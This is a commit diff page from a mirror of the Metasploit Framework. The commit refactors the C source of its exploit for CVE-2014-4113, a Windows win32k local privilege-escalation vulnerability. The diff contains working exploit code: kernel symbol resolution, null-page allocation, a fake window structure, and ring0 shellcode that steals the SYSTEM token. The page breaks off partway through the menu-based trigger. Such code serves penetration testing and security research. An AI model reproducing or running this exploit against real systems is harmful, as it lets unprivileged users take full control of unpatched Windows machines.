infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4082, @OJ's cleanup and improvements for CVE-2014-4113

bug/bundler_fix
jvazquez-r7 2014-10-28 09:49:18 -05:00
parent dade6b97ba 908094c3d3
commit c1b82bac0e
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
7 changed files with 439 additions and 337 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
View File

Binary file not shown.

22
external/source/exploits/cve-2014-4113/cve-2014-4113.sln vendored
View File

@ -1,9 +1,9 @@
 
Microsoft Visual Studio Solution File, Format Version 12.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop # Visual Studio 2013
VisualStudioVersion = 12.0.30723.0 VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1 MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
EndProject EndProject
Global Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -13,14 +13,14 @@ Global
Release|x64 = Release|x64 Release|x64 = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64 {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(SolutionProperties) = preSolution GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE HideSolutionNode = FALSE

505
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c vendored
View File

@ -2,6 +2,9 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Uncomment this line to enable to debug output
//#define DEBUGGING
// Purloined from ntstatus.h // Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
@ -9,23 +12,17 @@
#include <windows.h> #include <windows.h>
#undef WIN32_NO_STATUS #undef WIN32_NO_STATUS
#ifdef DEBUGGING
// only needed because of the output printf stuff when debugging
#include <stdio.h>
#endif
#ifndef _NTDEF_ #ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS; typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS; typedef NTSTATUS *PNTSTATUS;
#endif #endif
#define DEBUGGING FALSE #define PTR_SIZE sizeof(UINT_PTR)
#ifdef _M_X64
typedef unsigned __int64 QWORD;
typedef QWORD *PQWORD;
#endif
int WndProcClue = 0;
int HookCallbackClue = 0;
WNDPROC lpPrevWndFunc;
DWORD MyProcessId = 0;
DWORD OffsetWindows = 0;
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)( typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN HANDLE ProcessHandle, IN HANDLE ProcessHandle,
@ -34,21 +31,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN PSIZE_T RegionSize, IN PSIZE_T RegionSize,
IN ULONG AllocationType, IN ULONG AllocationType,
IN ULONG Protect IN ULONG Protect
); );
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)( typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
IN HANDLE ProcessId, IN HANDLE ProcessId,
OUT PVOID Process OUT PVOID Process
); );
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)( typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass, _In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation, _Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength, _In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength _Out_opt_ PULONG ReturnLength
); );
typedef struct _SYSTEM_MODULE { typedef struct _SYSTEM_MODULE
{
HANDLE Reserved1; HANDLE Reserved1;
PVOID Reserved2; PVOID Reserved2;
PVOID ImageBaseAddress; PVOID ImageBaseAddress;
@ -61,44 +59,60 @@ typedef struct _SYSTEM_MODULE {
BYTE Name[256]; BYTE Name[256];
} SYSTEM_MODULE, *PSYSTEM_MODULE; } SYSTEM_MODULE, *PSYSTEM_MODULE;
typedef struct _SYSTEM_MODULE_INFORMATION
typedef struct _SYSTEM_MODULE_INFORMATION { {
ULONG ModulesCount; ULONG ModulesCount;
SYSTEM_MODULE Modules[0]; SYSTEM_MODULE Modules[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
BOOL bWndProcFlag = FALSE;
BOOL bHookCallbackFlag = FALSE;
WNDPROC lpPrevWndFunc;
DWORD dwMyProcessId = 0;
DWORD dwOffsetWindows = 0;
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL; lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL; lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
#ifdef DEBUGGING
void dprintf(char* pszFormat, ...)
{
char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
OutputDebugString(s_acBuf);
va_end(args);
}
#else
#define dprintf(...)
#endif
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) long CALLBACK hook_callback_two(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{ {
EndMenu(); EndMenu();
return -5; return -5;
} }
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) { LRESULT CALLBACK hook_callback(int code, WPARAM wParam, LPARAM lParam)
#ifdef _M_X64 {
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue) if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !bHookCallbackFlag)
#else
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
#endif
{ {
HookCallbackClue = 1; bHookCallbackFlag = TRUE;
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) { if (UnhookWindowsHook(WH_CALLWNDPROC, hook_callback))
#ifdef _M_X64 {
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo); lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)hook_callback_two);
#else
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
#endif
} }
} }
return CallNextHookEx(0, code, wParam, lParam); return CallNextHookEx(0, code, wParam, lParam);
} }
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { LRESULT CALLBACK wnd_proc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
if (msg == 289 && WndProcClue != 1) { {
WndProcClue = 1; if (msg == 289 && !bWndProcFlag)
{
bWndProcFlag = TRUE;
PostMessageA(hwnd, 256, 40, 0); PostMessageA(hwnd, 256, 40, 0);
PostMessageA(hwnd, 256, 39, 0); PostMessageA(hwnd, 256, 39, 0);
PostMessageA(hwnd, 513, 0, 0); PostMessageA(hwnd, 513, 0, 0);
@ -106,380 +120,375 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
return DefWindowProc(hwnd, msg, wParam, lParam); return DefWindowProc(hwnd, msg, wParam, lParam);
} }
DWORD_PTR __stdcall get_threadinfo_ptr(void)
{
#ifdef _M_X64 #ifdef _M_X64
QWORD MyPtiCurrent(void) { PBYTE pTeb = (PBYTE)__readgsqword(0x30);
void *teb = (void *)__readgsqword(0x30); return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x78));
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
return Win32ThreadInfo;
}
#else #else
DWORD __stdcall MyPtiCurrent() { PBYTE pTeb = (PBYTE)__readfsdword(0x18);
__asm { return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x40));
mov eax, fs : 18h
mov eax, [eax + 40h]
}
}
#endif #endif
}
int _stdcall shellcode_ring0(int one, int two, int three, int four) { int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *my_process_info = NULL; void *my_process_info = NULL;
void *system_info = NULL; void *system_info = NULL;
pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info); pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
pPsLookupProcessByProcessId((HANDLE)4, &system_info); pPsLookupProcessByProcessId((HANDLE)4, &system_info);
*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows); *(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
return 0; return 0;
} }
void DWORD WINAPI execute_payload(LPVOID lpPayload)
LogMessage(char* pszFormat, ...) { {
if (DEBUGGING != TRUE) {
return;
}
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf(s_acBuf, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
VOID(*lpCode)() = (VOID(*)())lpPayload; VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode(); lpCode();
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
void Win32kNullPage(LPVOID lpPayload) { void win32k_null_page(LPVOID lpPayload)
HWND hWnd; {
WNDCLASSA WndClass; WNDCLASSA wndClass;
LPBYTE promise_land = NULL; char szNtName[256];
HMODULE hNtdll = NULL; PVOID pNtBase;
HMODULE ntkrnl = NULL; OSVERSIONINFOA versionInfo;
NTSTATUS status;
PULONG pSystemInfoBuffer = NULL;
lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
ULONG SystemInfoBufferSize = 0;
char nt_name[256];
PVOID nt_base;
OSVERSIONINFOA VersionInformation;
// Getting Windows version // Getting Windows version
LogMessage("[*] Getting Windows version..."); dprintf("[*] Getting Windows version...");
memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA)); memset(&versionInfo, 0, sizeof(OSVERSIONINFOA));
VersionInformation.dwOSVersionInfoSize = 148; versionInfo.dwOSVersionInfoSize = 148;
if (!GetVersionExA(&VersionInformation)) {
LogMessage("[!] Failed to get windows version"); if (!GetVersionExA(&versionInfo))
{
dprintf("[!] Failed to get windows version");
return; return;
} }
#ifdef _M_X64 #ifdef _M_X64
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1 if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
LogMessage("[*] Windows 6.1 found..."); {
OffsetWindows = 0x208; // Ex: Windows 7 SP1
dprintf("[*] Windows 6.1 found...");
dwOffsetWindows = 0x208;
} }
#else #else
if (VersionInformation.dwMajorVersion == 6) { if (versionInfo.dwMajorVersion == 6)
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1 {
LogMessage("[*] Windows 6.1 found..."); if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
OffsetWindows = 0xf8; {
// Ex: Windows 7 SP1
dprintf("[*] Windows 6.1 found...");
dwOffsetWindows = 0xf8;
} }
else if (!VersionInformation.dwMinorVersion) { else if (!versionInfo.dwMinorVersion)
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2 {
OffsetWindows = 0xe0; // Ex: Windows 2008 R2
dprintf("[*] Windows 6.0 found...");
dwOffsetWindows = 0xe0;
} }
else { else
LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion); {
dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
return; return;
} }
} }
else if (VersionInformation.dwMajorVersion == 5) { else if (versionInfo.dwMajorVersion == 5)
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3 {
LogMessage("[*] Windows 5.1 found..."); if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
OffsetWindows = 0xc8; {
// Ex: Windows XP SP3
dprintf("[*] Windows 5.1 found...");
dwOffsetWindows = 0xc8;
} }
else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2 else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
LogMessage("[*] Windows 5.2 found..."); {
OffsetWindows = 0xd8; // Ex: Windows 2003 SP2
dprintf("[*] Windows 5.2 found...");
dwOffsetWindows = 0xd8;
} }
else { else
LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm"); {
dprintf("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
return; return;
} }
} }
#endif #endif
else { else
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion); {
dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
return; return;
} }
// Solve symbols // Solve symbols
LogMessage("[*] Solving symbols..."); dprintf("[*] Solving symbols...");
hNtdll = LoadLibraryA("ntdll"); HMODULE hNtdll = LoadLibraryA("ntdll");
if (hNtdll == NULL) { if (hNtdll == NULL)
LogMessage("[!] Failed to Load ntdll..."); {
dprintf("[!] Failed to Load ntdll...");
return; return;
} }
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation"); lZwQuerySystemInformation pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if (pZwQuerySystemInformation == NULL) { if (pZwQuerySystemInformation == NULL)
LogMessage("[!] Failed to solve ZwQuerySystemInformation"); {
dprintf("[!] Failed to solve ZwQuerySystemInformation");
return; return;
} }
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
if (pNtAllocateVirtualMemory == NULL) { if (pNtAllocateVirtualMemory == NULL)
LogMessage("[!] Failed to solve NtAllocateVirtualMemory"); {
dprintf("[!] Failed to solve NtAllocateVirtualMemory");
return; return;
} }
LogMessage("[*] Requesting Kernel loaded modules..."); dprintf("[*] Requesting Kernel loaded modules...");
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize); ULONG ulSystemInfoBufferSize = 0;
pZwQuerySystemInformation(11, &ulSystemInfoBufferSize, 0, &ulSystemInfoBufferSize);
if (SystemInfoBufferSize == 0) { if (ulSystemInfoBufferSize == 0)
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed"); {
return; dprintf("[!] Requesting pZwQuerySystemInformation required length failed");
}
else {
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
}
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
if (pSystemInfoBuffer == NULL) {
LogMessage("[!] Allocation for SystemInfo failed");
return; return;
} }
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize); dprintf("[*] pZwQuerySystemInformation required length %d", ulSystemInfoBufferSize);
if (status != STATUS_SUCCESS) { PULONG pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, ulSystemInfoBufferSize);
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed"); if (pSystemInfoBuffer == NULL)
{
dprintf("[!] Allocation for SystemInfo failed");
return; return;
} }
if (pZwQuerySystemInformation(11, pSystemInfoBuffer, ulSystemInfoBufferSize, &ulSystemInfoBufferSize) != STATUS_SUCCESS)
{
dprintf("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
return;
}
LogMessage("[*] Parsing SYSTEM_INFO..."); dprintf("[*] Parsing SYSTEM_INFO...");
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer; SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount); dprintf("[*] %d Kernel modules found", smi->ModulesCount);
memset(nt_name, 0, 256); memset(szNtName, 0, 256);
int i = 0; ULONG i = 0;
while (i < smi->ModulesCount) { while (i < smi->ModulesCount)
{
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i); SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
LogMessage("[*] Checking module %s", sm->Name); dprintf("[*] Checking module %s", sm->Name);
if (strstr((char *)sm->Name, ".exe")) { if (strstr((char *)sm->Name, ".exe"))
{
char *start = strstr((char *)sm->Name, "nt"); char *start = strstr((char *)sm->Name, "nt");
if (start != NULL) { if (start != NULL)
nt_base = sm->ImageBaseAddress; {
strncpy_s(nt_name, 256, start, _TRUNCATE); pNtBase = sm->ImageBaseAddress;
strncpy_s(szNtName, 256, start, _TRUNCATE);
break; break;
} }
} }
i++; i++;
} }
if (nt_name == NULL) { if (szNtName == NULL)
LogMessage("[!] nt not found"); {
dprintf("[!] nt not found");
return; return;
} }
else { dprintf("[*] Good! nt found as %s at 0x%08x", szNtName, pNtBase);
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
}
ntkrnl = LoadLibraryA(nt_name); HMODULE hNtKrnl = LoadLibraryA(szNtName);
LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl); dprintf("[*] %s loaded in userspace at: %08x", szNtName, hNtKrnl);
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId"); pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(hNtKrnl, "PsLookupProcessByProcessId");
if (pPsLookupProcessByProcessId == NULL) { if (pPsLookupProcessByProcessId == NULL)
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n"); {
dprintf("[!] Failed to solve PsLookupProcessByProcessId");
return; return;
} }
#ifdef _M_X64 pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl)); dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
#else
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
#endif
MyProcessId = GetCurrentProcessId(); dwMyProcessId = GetCurrentProcessId();
// Register Class // Register Class
LogMessage("[*] Registering class..."); dprintf("[*] Registering class...");
memset(&WndClass, 0, sizeof(WNDCLASSA)); memset(&wndClass, 0, sizeof(WNDCLASSA));
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx wndClass.lpfnWndProc = wnd_proc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
WndClass.lpszClassName = "woqunimalegebi"; wndClass.lpszClassName = "woqunimalegebi";
if (RegisterClassA(&WndClass) == 0) { if (!RegisterClassA(&wndClass))
LogMessage("[!] RegisterClassA failed "); {
dprintf("[!] RegisterClassA failed ");
return; return;
} }
// Create Window // Create Window
LogMessage("[*] Creating window..."); dprintf("[*] Creating window...");
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL); HWND hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
if (hWnd == NULL) { if (hWnd == NULL)
LogMessage("[!] CreateWindowExA failed"); {
dprintf("[!] CreateWindowExA failed");
return; return;
} }
// Making everything ready for exploitation... // Making everything ready for exploitation...
LogMessage("[*] Allocating null page..."); dprintf("[*] Allocating null page...");
#ifdef _M_X64 #ifdef _M_X64
ULONGLONG base_address = 0x00000000fffffffb; ULONGLONG dwBaseAddress = 0x00000000fffffffb;
#else #else
DWORD base_address = 1; DWORD dwBaseAddress = 1;
#endif #endif
SIZE_T region_size = 0x1000;
ULONG zero_bits = 0;
HANDLE current_process = NULL;
current_process = GetCurrentProcess(); SIZE_T sRegionSize = 0x1000;
ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) { if (pNtAllocateVirtualMemory(GetCurrentProcess(), (LPVOID*)&dwBaseAddress, 0, &sRegionSize, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
LogMessage("[!] Failed to allocate null page"); {
dprintf("[!] Failed to allocate null page");
return; return;
} }
LogMessage("[*] Getting PtiCurrent..."); dprintf("[*] Getting PtiCurrent...");
#ifdef _M_X64 DWORD_PTR dwThreadInfoPtr = get_threadinfo_ptr();
ULONGLONG pti = MyPtiCurrent();
#else
DWORD pti = MyPtiCurrent();
#endif
if (pti == 0) { if (dwThreadInfoPtr == 0)
{
LoadLibrary("user32.dll"); LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll"); LoadLibrary("gdi32.dll");
pti = MyPtiCurrent(); dwThreadInfoPtr = get_threadinfo_ptr();
} }
if (pti == 0) { if (dwThreadInfoPtr == 0)
LogMessage("[!] Filed to get PtiCurrent"); {
dprintf("[!] Filed to get current thread information");
return; return;
} }
else {
#ifdef _M_X64
LogMessage("[*] Good! pti 0x%016llx", pti);
#else
LogMessage("[*] Good! pti 0x%08x", pti);
#endif
}
LogMessage("[*] Creating a fake structure at NULL..."); dprintf("[*] Good! dwThreadInfoPtr 0x%p", dwThreadInfoPtr);
dprintf("[*] Creating a fake structure at NULL...");
LPVOID lpPtr = NULL;
#ifdef _M_X64 #ifdef _M_X64
void *test = NULL; (DWORD_PTR)lpPtr = 0x10000000B;
(QWORD)test = 0x10000000B; *((PDWORD_PTR)lpPtr) = dwThreadInfoPtr;
*((PQWORD)test) = pti;
/* win32k!tagWND->bServerSideWindowProc = TRUE */ /* win32k!tagWND->bServerSideWindowProc = TRUE */
(QWORD)test = 0x100000025; (DWORD_PTR)lpPtr = 0x100000025;
*((PBYTE)test) = 4; *((PBYTE)lpPtr) = 4;
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */ /* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
(QWORD)test = 0x10000008B; (DWORD_PTR)lpPtr = 0x10000008B;
*((PQWORD)test) = &shellcode_ring0; *((PDWORD_PTR)lpPtr) = (DWORD_PTR)shellcode_ring0;
#else #else
void *test = promise_land + 3; LPBYTE lpPromisedLand = NULL;
lpPtr = lpPromisedLand + 3;
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen) /* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
.text:BF8B93F4 02C mov edi, _gptiCurrent .text:BF8B93F4 02C mov edi, _gptiCurrent
.text:BF8B93FA 02C cmp edi, [esi + 8]; .text:BF8B93FA 02C cmp edi, [esi + 8];
.text:BF8B93FD 02C jz loc_BF8B .text:BF8B93FD 02C jz loc_BF8B
*/ */
*(LPDWORD)test = pti; *(LPDWORD)lpPtr = dwThreadInfoPtr;
*((LPBYTE)(promise_land + 0x11)) = 0x4; *((LPBYTE)(lpPromisedLand + 0x11)) = 0x4;
test = promise_land + 0x5b; lpPtr = lpPromisedLand + 0x5b;
*(LPDWORD)test = (DWORD)shellcode_ring0; *(LPDWORD)lpPtr = (DWORD)shellcode_ring0;
#endif #endif
// Exploit! // Exploit!
LogMessage("[*] Triggering vulnerability..."); dprintf("[*] Triggering vulnerability...");
HMENU MenuOne = CreatePopupMenu(); HMENU hMenuOne = CreatePopupMenu();
if (MenuOne == NULL) { if (hMenuOne == NULL)
LogMessage("[!] First CreatePopupMenu failed"); {
dprintf("[!] First CreatePopupMenu failed");
return; return;
} }
MENUITEMINFOA MenuOneInfo; MENUITEMINFOA menuOneInfo;
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA)); memset(&menuOneInfo, 0, sizeof(MENUITEMINFOA));
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA); menuOneInfo.cbSize = sizeof(MENUITEMINFOA);
MenuOneInfo.fMask = MIIM_STRING; menuOneInfo.fMask = MIIM_STRING;
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) { if (InsertMenuItemA(hMenuOne, 0, TRUE, &menuOneInfo) != TRUE)
LogMessage("[!] First InsertMenuItemA failed"); {
DestroyMenu(MenuOne); dprintf("[!] First InsertMenuItemA failed");
DestroyMenu(hMenuOne);
return; return;
} }
HMENU MenuTwo = CreatePopupMenu(); HMENU hMenuTwo = CreatePopupMenu();
if (MenuTwo == NULL) { if (hMenuTwo == NULL)
LogMessage("[!] Second CreatePopupMenu failed"); {
DestroyMenu(MenuOne); dprintf("[!] Second CreatePopupMenu failed");
DestroyMenu(hMenuOne);
return; return;
} }
MENUITEMINFOA MenuTwoInfo; MENUITEMINFOA menuTwoInfo;
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA)); memset(&menuTwoInfo, 0, sizeof(MENUITEMINFOA));
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA); menuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU); menuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
MenuTwoInfo.dwTypeData = ""; menuTwoInfo.dwTypeData = "";
MenuTwoInfo.cch = 1; menuTwoInfo.cch = 1;
MenuTwoInfo.hSubMenu = MenuOne; menuTwoInfo.hSubMenu = hMenuOne;
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
LogMessage("[!] Second InsertMenuItemA failed"); if (InsertMenuItemA(hMenuTwo, 0, TRUE, &menuTwoInfo) != TRUE)
DestroyMenu(MenuTwo); {
DestroyMenu(MenuOne); dprintf("[!] Second InsertMenuItemA failed");
DestroyMenu(hMenuTwo);
DestroyMenu(hMenuOne);
return; return;
} }
